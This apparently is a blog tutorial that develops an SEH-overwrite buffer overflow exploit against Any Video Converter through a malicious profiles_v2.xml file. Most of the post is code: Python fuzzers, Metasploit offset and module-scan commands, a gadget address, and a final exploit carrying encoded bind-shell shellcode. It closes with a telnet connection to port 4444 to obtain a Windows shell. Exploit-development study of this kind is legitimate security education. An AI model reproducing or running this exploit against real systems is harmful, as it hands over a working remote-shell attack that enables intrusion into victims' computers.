Posted by shinigami at 21:18
Read our previous post
In this section We will learn how to exploit on Any Video Converter. First, we must find out the vulnerability of application which can attack using buffer overflow. This case, I was founds that profiles_v2.xml is vulnerable. So we need to create fuzzer for look like profiles_v2.xml#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\x41" * 1000
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"
sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file
Run the fuzzer, it will generating file named "profiles_v2.xml", copy this file into root directory of Any Video Converter.
Open Any Video Converter using Ollydbg, and press F9.
Look at the ESP stack, stack contains "A" characters. To bypass the SEH, click View->SEH Cain and press Shift+F9. Your EIP will be overwrite.
To know where is exactly the EIP overwrite, I will use tools from metasploit.
./pattern_create.rb 1000
Edit your fuzzer with pattern.
#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\xAF\xDE\x20\x3E............."
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"
sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file
Run the fuzzer again, copy the result into AnyVideo Converter directory and load the application with Ollydbg then press F9.
Bypass the SEH, click View->SEH Cain and press Shift+F9. Please note the value of EIP.
To check the byte of EIP was overwritten, open pattern _offset.
./pattern_offset.rb the_value_of_eip
Now we must check the module which used by application where does't compile with SEH Handler.
I choose dvcapture.dll , to verify that not compile using SEH Handler
./msfpescan -i dvcapture.dll | grep DllCharacteristics
if return 0x0000000 it means that module not compiled with SEHandler
./msfpescan -i dvcapture.dll | grep SEHandler
if return nothing, it means that module not compiled with SEHandler
On the Ollydbg, click View->Executable Module, and select dvcapture.dll then right click->Search For->Sequence Command->POP r32 POP r32 RETN
Note the address of first POP.
Back into fuzzer and edit :
Back into fuzzer and edit :
#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\x90" * 328
buffer += "\xeb\x06\x90\x90" #JMP Short bypass SEH
buffer +="\x33\xE6\x01\x10" #Address of SEH
buffer += "\x90" * (1000-len(buffer))
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"
sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file
Run your fuzzer, copy the result into AnyVideo Conv directory and load application using Ollydbg.
click View->SEH Cain and press Shift+F9 look at the EIP value, trying to load dvcapture.dll ? If yes the fuzzer is succesfully.
Now, passed the payload into fuzzer...
Please notes the Bad Characters are 00,0a,0d,22,25,26,3e
Now, passed the payload into fuzzer...
Please notes the Bad Characters are 00,0a,0d,22,25,26,3e
#!C:\Python27\python.exe
filename = "profiles_v2.xml"
buffer = "\x90" * 328
buffer += "\xeb\x06\x90\x90"
buffer +="\x33\xE6\x01\x10"
#PAYLOAD Bind Shell
buffer += ("\x2b\xc9\xb1\x51\xdb\xd3\xd9\x74\x24\xf4\xbf\x05\xa5\x63\x91\x58"
"\x31\x78\x13\x83\xc0\x04\x03\x7d\xaa\x81\x64\x81\xde\xae\xca\x91"
"\xe6\xce\x2a\x9e\x79\xba\xb9\x44\x5e\x37\x04\xb8\x15\x3b\x82\xb8"
"\x28\x2b\x07\x77\x33\x38\x47\xa7\x42\xd5\x31\x2c\x70\xa2\xc3\xdc"
"\x48\x74\x5a\x8c\x2f\xb4\x29\xcb\xee\xff\xdf\xd2\x32\x14\x2b\xef"
"\xe6\xcf\xfc\x7a\xe2\x9b\xa2\xa0\xed\x70\x3a\x23\xe1\xcd\x48\x6c"
"\xe6\xd0\xa5\x91\x3a\x58\xb0\xf9\x66\x42\xa2\xc2\x56\xa1\x40\x4f"
"\xdb\x65\x02\x0f\xd0\x0e\x64\x93\x45\x9b\xc5\xa3\xcb\xf4\x4b\xfd"
"\xfd\xe8\x04\xfe\xd4\x97\xf7\x66\xb1\x64\xca\x0e\x36\xf8\x18\x91"
"\xec\x01\x8c\x45\xc6\x13\xd1\xae\x88\x14\xfc\x8f\xa1\x0e\x67\xae"
"\x5f\xd8\x6a\xe5\xf5\xdb\x95\xd5\x62\x05\x60\x20\xdf\xe2\x8c\x1c"
"\x73\x5e\x20\xf3\x27\x23\x95\xb0\x94\x5c\xc9\x50\x73\xb2\xb6\xfa"
"\xd0\x3d\xa7\x97\xbf\x99\x32\xe7\xf8\xb5\xbd\xd1\x6d\x2a\x13\x88"
"\x8e\x9a\xfb\x96\xdc\x35\x15\x81\xe1\x9c\xb6\x78\xe1\xf1\x51\x67"
"\x54\x74\xe8\x30\x98\xae\xbb\xea\x32\x1a\xc3\xc2\x28\xcc\xdc\x9b"
"\x88\x74\x74\xa4\xc3\xd2\x85\x8a\x8a\xb6\x1d\x4c\x3b\x24\xb3\x19"
"\x5e\xc0\x1b\x40\x88\xd9\x15\x95\xa0\xa5\xac\xbb\x04\xe6\x5c\x91"
"\x99\xa4\x8f\x1b\x27\x05\x43\x6e\xd2\x6d\xc8\xdb\x88\xe6\x7c\xe5"
"\x7c\xe0\x7f\x6c\xc7\xf2\x56\xd5\x90\x5e\x06\xb8\x4f\x35\xa9\x6b"
"\x21\x9c\xf8\x74\x11\x76\x56\x53\x97\x49\xfb\x9c\x4e\x3f\x03\x9d"
"\x58\x3f\x2b\xea\xf0\x43\x4f\x28\x9a\x44\x86\xe2\x9c\x6b\x4f\x7c"
"\xbb\x6e\xe3\xd3\xc4\xb9\xfb\x03")
buffer += "\x90" * (1000-len(buffer))
header = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?>\n"
header += "<root>\n"
header += "<categories>\n"
header += "<category name=\""+buffer+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"Lorem ipsum dolor\"/>\n"
header += "</categories>\n"
header += "<groups></groups>\n"
header += "<profiles></profiles>\n"
header += "</root>\n"
sploit = header
fopen = open(filename,'w') # write file
fopen.write(sploit) # insert buffer into file
fopen.close() # close file
Run fuzzer, copy file into AnyVideo Converter directory, and Run the application.
Back into backtrack, open terminal and run telnet command:
telnet 192.168.56.101 4444
Okay, you got the windows shell
No comments:
Post a Comment